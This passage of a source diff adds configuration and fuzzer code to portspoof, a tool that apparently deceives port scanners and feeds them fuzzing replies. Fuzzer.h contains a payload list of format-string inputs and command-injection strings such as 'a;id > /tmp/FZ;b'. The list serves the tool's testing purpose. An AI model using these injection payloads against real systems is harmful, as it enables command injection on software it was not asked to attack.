+	  "-n			  nmap wrap fuzz signatures\n"
+	  "-h			  display this help and exit\n\n"
+	"Without any OPTION - use default values and continue\n");
+	
+	exit(1);
+}
+
+bool Configuration::processArgs(int argc, char** argv)
+{
+	int	ch;
+	extern char *__progname;
+	
+	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
+		switch (ch) {
+		case 'i':
+			this->bind_ip = std::string(optarg);
+			this->opts[OPT_IP]=1;
+			break;
+		case 'p':
+			this->port  = atoi(optarg);
+			this->opts[OPT_PORT]=1;
+			break;
+		case 's':
+			this->signaturefile  = std::string(optarg);
+			this->opts[OPT_SIG_FILE]=1;
+			
+			break;
+		case 'c':
+			this->configfile  = std::string(optarg);
+			this->opts[OPT_CONFIG_FILE]=1;
+			
+			break;
+		case 'v':
+		this->opts[OPT_DEBUG]=1;
+			fprintf(stdout,"-> Verbose mode on.\n");
+			break;
+		case 'd':
+		this->opts[OPT_SYSLOG_DIS]=1;
+			fprintf(stdout,"-> Syslog logging disabled.\n");
+			break;
+		case 'l':
+		this->opts[OPT_LOG_FILE]=1;
+			this->logfile  = std::string(optarg);
+			fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
+			break;	
+		case 'f':
+		this->opts[OPT_FUZZ_WORDLIST]=1;
+			this->fuzzpayload_file=std::string(optarg);
+			fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
+			break;
+		case 'n':
+			this->opts[OPT_FUZZ_NMAP]=1;
+			this->nmapfuzzsignatures_file=std::string(optarg);
+			fprintf(stdout,"-> NMAP wrapper mode!\n");
+			break;
+		case '1':
+			this->opts[OPT_FUZZ_INTERNAL]=1;
+			fprintf(stdout,"-> Generate fuzzing payloads!\n");
+			break;
+		case '2':
+			this->opts[OPT_NOT_NMAP_SCANNER]=1;
+			fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
+			break;
+		case '3':
+			this->opts[OPT_FUZZ_RANDOM]=1;
+			fprintf(stdout,"-> Random int fuzzing!\n");
+			break;			
+		case 'h':
+			this->usage();
+			break;
+		default:
+			fprintf(stdout,"Try ` %s -h' for more information.\n\n", __progname);
+			exit(0);
+			break;
+			}
+	}
+	
+
+	if(this->opts==0)
+	{
+		fprintf(stdout,"-> No parameters - using default values.\n");
+	}
+			
+	if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
+		this->fuzzer=new Fuzzer(this);
+	
+	
+	return 0;
+}
+
+std::string Configuration::getConfigFile()
+{
+	return this->configfile;
+}
+std::string Configuration::getSignatureFile()
+{
+	return this->signaturefile;
+	
+}
+std::string Configuration::getNmapfuzzSignaturesFile()
+{
+	return this->nmapfuzzsignatures_file;
+}
+std::string Configuration::getFuzzPayloadFile()
+{
+	return this->fuzzpayload_file;
+	
+}
+std::string Configuration::getLogFile()
+{
+	return this->logfile;
+}
+
+std::string Configuration::getBindIP()
+{
+	return this->bind_ip;
+}
+
+unsigned short int Configuration::getPort()
+{
+	return this->port;
+}
+
+std::vector<char> Configuration::mapPort2Signature(unsigned short port)
+{	
+	/*
+	if(this->opts&OPT_FUZZ_WORDLIST
+	{
+		
+		std::string input_line;
+		std::getline(std::cin, input_line);
+		std::vector<char> result_vector;
+
+		for(int i=0; i<input_line.length();i++)
+			result_vector.push_back(input_line[i]);
+		return result_vector;
+		
+	}
+	*/
+	if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
+	{
+		std::vector<char> result_vector;		
+		result_vector=this->fuzzer->GetFUZZ();
+		return result_vector;
+	}
+	else
+	return this->portsignatureemap[port];
+}
+
+bool Configuration::processSignatureFile()
+{
+	
+	char buf_file[BUFSIZE];
+
+	FILE *fp = fopen(this->signaturefile.c_str(), "r");
+	if (fp == NULL) {
+	    fprintf(stdout,"Error opening signature file: %s \n",this->signaturefile.c_str());
+		return 1;
+	}
+	
+	while (fgets(buf_file, BUFSIZE, fp))
+				rawsignatures.push_back(std::string(buf_file));
+	
+	fclose(fp);
+	
+				  // set  random mapping
+				  //srand((unsigned)time(0)); 	
+				  for(int i=0;i<MAX_PORTS;i++)
+					{
+					//portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[rand()%rawsignatures.size()])));
+					portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[i%rawsignatures.size()])));
+			
+					}
+					
+
+	return 0;
+					
+}
+
+bool Configuration::readConfigFile()
+{
+	char tmp[BUFSIZE], str1[BUFSIZE], str2[BUFSIZE];
+	int lp,hp;
+	std::stringstream ss;
+
+	
+	FILE *fp = fopen(this->configfile.c_str(), "r");
+	if (fp == NULL) {
+	    fprintf(stdout,"Error opening file: %s \n",this->configfile.c_str());
+		return 1;
+	}
+	
+	while (fgets(tmp, BUFSIZE, fp))
+	    if (strlen(tmp) >1 && tmp[0]!='#')
+			{
+				
+				if(sscanf(tmp, "%s %s",str1,str2)==EOF){
+					fprintf(stdout,"Error in configuration file");
+					exit(1);
+				}
+				
+				if(str1==NULL || str2==NULL)
+				{
+					fprintf(stdout,"Error in configuration file");
+					exit(1);
+				}
+				
+				if(Utils::isNumeric(str1)) //single port
+				{
+					sscanf(str1,"%d",&lp);
+					//DEBUG
+					//fprintf(stdout,"port %d value: %s\n",lp,Utils::get_substring_value(tmp));
+				
+					portsignatureemap[lp]=process_signature(std::string(Utils::get_substring_value(tmp)));	
+					continue;
+				}
+				else
+				{
+						if(sscanf(str1, "%d-%d",&lp,&hp)==EOF){
+							fprintf(stdout,"Error in configuration file\n");
+							exit(1);
+						}
+						
+						if(lp==0 || hp==0)
+						{
+							fprintf(stdout,"Error in configuration file");
+							exit(1);
+						}
+						
+						//DEBUG
+						//fprintf(stdout,"range port %d-%d value: %s\n",lp,hp,Utils::get_substring_value(tmp));
+						
+						for(int i=lp;i<=hp;i++)
+						portsignatureemap[i]=process_signature(std::string(Utils::get_substring_value(tmp)));
+						
+						continue;
+						
+				}
+				
+			}
+	
+	fclose(fp);
+
+		
+	return 0;
+	
+}
+

src/src/Configuration.h

@@ -0,0 +1,94 @@
+#ifndef CONFIG_H
+#define CONFIG_H
+
+#define CONFSEPARATOR "/"
+#define DEFAULT_PORT 4444
+#define BUFSIZE 1024
+
+#define LOG_FILE "portspoof.log"
+#define CONF_FILE "portspoof.conf"
+#define SIGNATURE_FILE "signatures"
+#define OPT_FUZZ_WORDLIST 1
+#define OPT_IP 2
+#define OPT_PORT 3
+#define OPT_DEBUG 4
+#define OPT_SIG_FILE 5
+#define OPT_LOG_FILE 6
+#define OPT_SYSLOG_DIS 7
+#define OPT_CONFIG_FILE 8
+#define OPT_FUZZ_NMAP 9
+#define OPT_FUZZ_INTERNAL 10
+#define OPT_NOT_NMAP_SCANNER 11
+#define OPT_FUZZ_RANDOM 12
+
+#define MAX_PORTS 65535
+
+#define NMAP_FUZZ_FILE_SIG "nmapfuzzsignatures"
+#define FUZZ_FILE_PAYLOAD "nmapfuzzpayloads"
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm> 
+#include <iostream>
+#include <ctime> 
+#include <bitset>
+
+#include "revregex.h" 
+#include "connection.h"
+
+#include "Utils.h"
+
+using namespace std;
+
+
+typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
+typedef vector < string > Raw_Signatures_Vector;
+typedef vector < string > Nmap_Fuzz_Vector;
+class Fuzzer;
+
+#include "Fuzzer.h"
+
+
+class Configuration {
+	private:
+		std::string configfile;
+		std::string signaturefile;
+		std::string logfile;
+		std::string bind_ip;
+		unsigned short int port;
+		bitset<20> opts;
+		Fuzzer* fuzzer;
+		std::string nmapfuzzsignatures_file;
+		std::string fuzzpayload_file;
+		Port_Signature_Map portsignatureemap;
+		Raw_Signatures_Vector rawsignatures;
+		
+		
+	public:
+		Configuration();
+		void usage(void);
+ 		bool processArgs(int argc, char** argv);
+		bool readConfigFile();
+		std::vector<char> mapPort2Signature(unsigned short port);
+		bool processSignatureFile();
+		
+		//getters
+		std::string getConfigFile();
+		std::string getSignatureFile();
+		std::string getLogFile();
+		std::string getBindIP();
+		std::string getNmapfuzzSignaturesFile();
+		std::string getFuzzPayloadFile();
+		bool getConfigValue(int value);
+		unsigned short int getPort();
+			
+};
+
+
+#endif

src/src/Fuzzer.cpp

@@ -0,0 +1,182 @@
+#include "Fuzzer.h"
+
+Fuzzer::Fuzzer()
+{	
+	
+
+	return;
+}
+
+Fuzzer::Fuzzer(Configuration* configuration)
+{	
+	
+	this->configuration = configuration;
+	this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
+	this->fuzzpayload_file = configuration->getFuzzPayloadFile();
+	this->counter=0;
+	this->payload_counter=0;
+	this->PrepareFuzzer();
+	
+	return;
+}
+
+
+bool Fuzzer::PrepareFuzzer()
+{
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+	{
+		
+	this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
+	if ( this->fp_payloads == NULL) {
+	    fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
+		return 1;
+	}
+	
+	}
+	/////
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+	{
+		
+	FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
+	if (fp == NULL) {
+		  fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
+		return 1;
+	}
+
+	char buf_file[BUFSIZE];
+	while (fgets(buf_file, BUFSIZE, fp))
+	nmapfuzzsignatures.push_back(std::string(buf_file));
+	fclose(fp);
+	fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
+    
+	}
+	
+	return 0;
+			
+}
+
+std::vector<char> Fuzzer::intToBytes(int paramInt)
+{
+     vector<char> arrayOfByte(4);
+     for (int i = 0; i < 4; i++)
+         arrayOfByte[3 - i] = (paramInt >> (i * 8));
+     return arrayOfByte;
+}
+
+
+std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
+{
+     vector<char> arrayOfByte(2);
+     for (int i = 0; i < 2; i++)
+         arrayOfByte[1 - i] = (paramInt >> (i * 4));
+     return arrayOfByte;
+}
+
+std::vector<char> Fuzzer::GenerateFuzzPayload()
+{
+	std::vector<char> result_vector;
+	std::string str;
+	
+	/*
+	for(int i=0;i<255;i++)
+		result_vector.push_back(i);
+	
+	return result_vector;
+	
+	
+		
+	if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
+		{
+			this->payload_counter++;
+			return this->shortToBytes((unsigned short)this->payload_counter);
+			
+		}
+		*/
+
+	if(this->payload_counter<10)
+	{
+		for(int i=0;i<4000*(this->payload_counter+1);i++)
+			result_vector.push_back(*(fuzz_oracle[0]));
+	}
+	else
+	{
+		
+		str=std::string(fuzz_oracle[this->payload_counter-9]);
+		result_vector=Utils::str2vector(str);		
+	}
+
+	this->payload_counter++;
+	
+	if(this->payload_counter>=25)
+		this->payload_counter=0;
+		
+	return result_vector;
+	
+}
+
+std::vector<char>  Fuzzer::GetFUZZ()
+{
+	std::vector<char> result_vector;
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+	{
+		
+	
+		if(this->counter%this->nmapfuzzsignatures.size()==0)
+		{
+	
+			char buf_file[BUFSIZE];
+			std::string str;
+	
+			if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
+			{
+					fprintf(stdout,"EOF of payload file\n");
+					fflush(stdout);
+			}
+			
+			str=std::string(buf_file);
+			str.erase(str.size() - 1);//remove \n
+			this->input_line=Utils::str2vector(str);
+	
+		}
+	
+		this->counter++;
+	
+	}
+	else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+	{	
+		result_vector=this->GenerateFuzzPayload();
+	}
+	else
+		fprintf(stdout,"Fuzz - shouldn't be here...\n");
+			
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+	{
+		
+		if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+			result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
+		else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+			result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
+		
+		result_vector=Utils::unescape(result_vector);	
+		
+	}
+
+	return result_vector;
+	
+	
+}
+
+
+/*
+std::string input_line;
+std::getline(std::cin, input_line);
+
+
+for(int i=0; i<input_line.length();i++)
+	result_vector.push_back(input_line[i]);
+return result_vector;
+*/

src/src/Fuzzer.h

@@ -0,0 +1,75 @@
+#ifndef FUZZER_H
+#define FUZZER_H
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm> 
+#include <iostream>
+#include <ctime> 
+#include <pthread.h>
+#include <iostream>
+#include <string>
+#include <iostream>
+#include <fstream>
+#include <sstream>
+
+#include "Utils.h"
+#include "Configuration.h"
+
+using namespace std;
+
+
+ static const char* const   fuzz_oracle[]=
+{
+"A",
+"%n%n%n%n%n",
+"%%20n",
+"%n%p%s%d%x",
+"%.1024d",
+"%.2049d",
+"-1",
+"32767",
+"65535",
+"-2147483647",
+"0xffffffff",
+"a|id > /tmp/FZ|b",
+"a`id > /tmp/FZ`b",
+"a'id > /tmp/FZ'b",
+"a;id > /tmp/FZ;b",
+"a&&id > /tmp/FZ&&b"
+};
+
+
+class Fuzzer{
+	private:
+	
+		std::string nmapfuzzsignatures_file;
+		std::string fuzzpayload_file;
+		Nmap_Fuzz_Vector nmapfuzzsignatures;
+		FILE *fp_payloads;
+		std::vector<char> input_line;
+		Configuration* configuration;
+		int counter;
+		int payload_counter;
+		int nmapfuzzsignatures_size;
+		
+	public:
+		Fuzzer();
+		Fuzzer(Configuration* configuration);
+		bool processSignatureFile();
+		std::vector<char> GetFUZZ();
+		std::vector<char> GenerateFuzzPayload();		
+		std::vector<char> intToBytes(int paramInt);
+		std::vector<char> shortToBytes(unsigned short paramInt);
+				
+		bool PrepareFuzzer();
+};
+
+
+#endif

src/src/Makefile.am

@@ -0,0 +1,17 @@
+## Process this file with automake to produce Makefile.in
+
+# File lists
+headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
+sources = connection.c portspoof.c revregex.c log.c config_file.c
+
+# Unix executables
+bin_PROGRAMS = portspoof
+portspoof_SOURCES = $(headers) $(sources)
+
+# Threads
+portspoof_LDFLAGS = @LDFLAGS@ -pthread
+
+#Preprocessor detinitions
+portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"' 
+
+

src/src/Makefile.in

@@ -0,0 +1,526 @@
+# Makefile.in generated by automake 1.10 from Makefile.am.
+# @configure_input@
+
+# Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,
+# 2003, 2004, 2005, 2006  Free Software Foundation, Inc.
+# This Makefile.in is free software; the Free Software Foundation
+# gives unlimited permission to copy and/or distribute it,
+# with or without modifications, as long as this notice is preserved.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
+# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
+# PARTICULAR PURPOSE.
+
+@SET_MAKE@
+
+VPATH = @srcdir@
+pkgdatadir = $(datadir)/@PACKAGE@
+pkglibdir = $(libdir)/@PACKAGE@
+pkgincludedir = $(includedir)/@PACKAGE@
+am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd
+install_sh_DATA = $(install_sh) -c -m 644
+install_sh_PROGRAM = $(install_sh) -c
+install_sh_SCRIPT = $(install_sh) -c
+INSTALL_HEADER = $(INSTALL_DATA)
+transform = $(program_transform_name)
+NORMAL_INSTALL = :
+PRE_INSTALL = :
+POST_INSTALL = :
+NORMAL_UNINSTALL = :
+PRE_UNINSTALL = :
+POST_UNINSTALL = :
+build_triplet = @build@
+host_triplet = @host@
+bin_PROGRAMS = portspoof$(EXEEXT)
+subdir = src
+DIST_COMMON = $(srcdir)/Makefile.am $(srcdir)/Makefile.in \
+	$(srcdir)/config.h.in
+ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
+am__aclocal_m4_deps = $(top_srcdir)/configure.in
+am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \
+	$(ACLOCAL_M4)
+mkinstalldirs = $(install_sh) -d
+CONFIG_HEADER = config.h
+CONFIG_CLEAN_FILES =
+am__installdirs = "$(DESTDIR)$(bindir)"
+binPROGRAMS_INSTALL = $(INSTALL_PROGRAM)
+PROGRAMS = $(bin_PROGRAMS)
+am__objects_1 =
+am__objects_2 = portspoof-connection.$(OBJEXT) \
+	portspoof-portspoof.$(OBJEXT) portspoof-revregex.$(OBJEXT) \
+	portspoof-log.$(OBJEXT) portspoof-config_file.$(OBJEXT)
+am_portspoof_OBJECTS = $(am__objects_1) $(am__objects_2)
+portspoof_OBJECTS = $(am_portspoof_OBJECTS)
+portspoof_LDADD = $(LDADD)
+portspoof_LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(portspoof_LDFLAGS) \
+	$(LDFLAGS) -o $@
+DEFAULT_INCLUDES = -I.@am__isrc@
+depcomp = $(SHELL) $(top_srcdir)/auto/depcomp
+am__depfiles_maybe = depfiles
+COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \
+	$(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS)
+CCLD = $(CC)
+LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@
+SOURCES = $(portspoof_SOURCES)
+DIST_SOURCES = $(portspoof_SOURCES)
+ETAGS = etags
+CTAGS = ctags
+DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)
+ACLOCAL = @ACLOCAL@
+AMTAR = @AMTAR@
+AUTOCONF = @AUTOCONF@
+AUTOHEADER = @AUTOHEADER@
+AUTOMAKE = @AUTOMAKE@
+AWK = @AWK@
+CC = @CC@
+CCDEPMODE = @CCDEPMODE@
+CFLAGS = @CFLAGS@
+CPP = @CPP@
+CPPFLAGS = @CPPFLAGS@
+CYGPATH_W = @CYGPATH_W@
+DEFS = @DEFS@
+DEPDIR = @DEPDIR@
+ECHO_C = @ECHO_C@
+ECHO_N = @ECHO_N@
+ECHO_T = @ECHO_T@
+EGREP = @EGREP@
+EXEEXT = @EXEEXT@
+GREP = @GREP@
+INSTALL = @INSTALL@
+INSTALL_DATA = @INSTALL_DATA@
+INSTALL_PROGRAM = @INSTALL_PROGRAM@
+INSTALL_SCRIPT = @INSTALL_SCRIPT@
+INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@
+LDFLAGS = @LDFLAGS@
+LIBOBJS = @LIBOBJS@
+LIBS = @LIBS@
+LTLIBOBJS = @LTLIBOBJS@
+MAKEINFO = @MAKEINFO@
+MKDIR_P = @MKDIR_P@
+OBJEXT = @OBJEXT@
+PACKAGE = @PACKAGE@
+PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@
+PACKAGE_NAME = @PACKAGE_NAME@
+PACKAGE_STRING = @PACKAGE_STRING@
+PACKAGE_TARNAME = @PACKAGE_TARNAME@
+PACKAGE_VERSION = @PACKAGE_VERSION@
+PATH_SEPARATOR = @PATH_SEPARATOR@
+SET_MAKE = @SET_MAKE@
+SHELL = @SHELL@
+STRIP = @STRIP@
+VERSION = @VERSION@
+abs_builddir = @abs_builddir@
+abs_srcdir = @abs_srcdir@
+abs_top_builddir = @abs_top_builddir@
+abs_top_srcdir = @abs_top_srcdir@
+ac_ct_CC = @ac_ct_CC@
+am__include = @am__include@
+am__leading_dot = @am__leading_dot@
+am__quote = @am__quote@
+am__tar = @am__tar@
+am__untar = @am__untar@
+bindir = @bindir@
+build = @build@
+build_alias = @build_alias@
+build_cpu = @build_cpu@
+build_os = @build_os@
+build_vendor = @build_vendor@
+builddir = @builddir@
+datadir = @datadir@
+datarootdir = @datarootdir@
+docdir = @docdir@
+dvidir = @dvidir@
+exec_prefix = @exec_prefix@
+host = @host@
+host_alias = @host_alias@
+host_cpu = @host_cpu@
+host_os = @host_os@
+host_vendor = @host_vendor@
+htmldir = @htmldir@
+includedir = @includedir@
+infodir = @infodir@
+install_sh = @install_sh@
+libdir = @libdir@
+libexecdir = @libexecdir@
+localedir = @localedir@
+localstatedir = @localstatedir@
+mandir = @mandir@
+mkdir_p = @mkdir_p@
+oldincludedir = @oldincludedir@
+pdfdir = @pdfdir@
+prefix = @prefix@
+program_transform_name = @program_transform_name@
+psdir = @psdir@
+sbindir = @sbindir@
+sharedstatedir = @sharedstatedir@
+srcdir = @srcdir@
+sysconfdir = @sysconfdir@
+target_alias = @target_alias@
+top_builddir = @top_builddir@
+top_srcdir = @top_srcdir@
+
+# File lists
+headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
+sources = connection.c portspoof.c revregex.c log.c config_file.c
+portspoof_SOURCES = $(headers) $(sources)
+
+# Threads
+portspoof_LDFLAGS = @LDFLAGS@ -pthread
+
+#Preprocessor detinitions
+portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"' 
+all: config.h
+	$(MAKE) $(AM_MAKEFLAGS) all-am
+
+.SUFFIXES:
+.SUFFIXES: .c .o .obj
+$(srcdir)/Makefile.in:  $(srcdir)/Makefile.am  $(am__configure_deps)
+	@for dep in $?; do \
+	  case '$(am__configure_deps)' in \
+	    *$$dep*) \
+	      cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \
+		&& exit 0; \
+	      exit 1;; \
+	  esac; \
+	done; \
+	echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu  src/Makefile'; \
+	cd $(top_srcdir) && \
+	  $(AUTOMAKE) --gnu  src/Makefile
+.PRECIOUS: Makefile
+Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status
+	@case '$?' in \
+	  *config.status*) \
+	    cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \
+	  *) \
+	    echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)'; \
+	    cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe);; \
+	esac;
+
+$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
+	cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
+
+$(top_srcdir)/configure:  $(am__configure_deps)
+	cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
+$(ACLOCAL_M4):  $(am__aclocal_m4_deps)
+	cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
+
+config.h: stamp-h1
+	@if test ! -f $@; then \
+	  rm -f stamp-h1; \
+	  $(MAKE) $(AM_MAKEFLAGS) stamp-h1; \
+	else :; fi
+
+stamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status
+	@rm -f stamp-h1
+	cd $(top_builddir) && $(SHELL) ./config.status src/config.h
+$(srcdir)/config.h.in:  $(am__configure_deps) 
+	cd $(top_srcdir) && $(AUTOHEADER)
+	rm -f stamp-h1
+	touch $@
+
+distclean-hdr:
+	-rm -f config.h stamp-h1
+install-binPROGRAMS: $(bin_PROGRAMS)
+	@$(NORMAL_INSTALL)
+	test -z "$(bindir)" || $(MKDIR_P) "$(DESTDIR)$(bindir)"
+	@list='$(bin_PROGRAMS)'; for p in $$list; do \
+	  p1=`echo $$p|sed 's/$(EXEEXT)$$//'`; \
+	  if test -f $$p \
+	  ; then \
+	    f=`echo "$$p1" | sed 's,^.*/,,;$(transform);s/$$/$(EXEEXT)/'`; \
+	   echo " $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) '$$p' '$(DESTDIR)$(bindir)/$$f'"; \
+	   $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) "$$p" "$(DESTDIR)$(bindir)/$$f" || exit 1; \
+	  else :; fi; \
+	done
+
+uninstall-binPROGRAMS:
+	@$(NORMAL_UNINSTALL)
+	@list='$(bin_PROGRAMS)'; for p in $$list; do \
+	  f=`echo "$$p" | sed 's,^.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/'`; \
+	  echo " rm -f '$(DESTDIR)$(bindir)/$$f'"; \
+	  rm -f "$(DESTDIR)$(bindir)/$$f"; \
+	done
+
+clean-binPROGRAMS:
+	-test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS)
+portspoof$(EXEEXT): $(portspoof_OBJECTS) $(portspoof_DEPENDENCIES) 
+	@rm -f portspoof$(EXEEXT)
+	$(portspoof_LINK) $(portspoof_OBJECTS) $(portspoof_LDADD) $(LIBS)
+
+mostlyclean-compile:
+	-rm -f *.$(OBJEXT)
+
+distclean-compile:
+	-rm -f *.tab.c
+
+@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-config_file.Po@am__quote@
+@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-connection.Po@am__quote@
+@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-log.Po@am__quote@
+@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-portspoof.Po@am__quote@
+@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-revregex.Po@am__quote@
+
+.c.o:
+@am__fastdepCC_TRUE@	$(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ $<
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(COMPILE) -c $<
+
+.c.obj:
+@am__fastdepCC_TRUE@	$(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(COMPILE) -c `$(CYGPATH_W) '$<'`
+
+portspoof-connection.o: connection.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.o -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='connection.c' object='portspoof-connection.o' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
+
+portspoof-connection.obj: connection.c
+@am__fastdepCC_TRUE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.obj -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
+@am__fastdepCC_TRUE@	mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	source='connection.c' object='portspoof-connection.obj' libtool=no @AMDEPBACKSLASH@
+@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
+@am__fastdepCC_FALSE@	$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
+
+portspoof-portspoof.o: portspoof.c
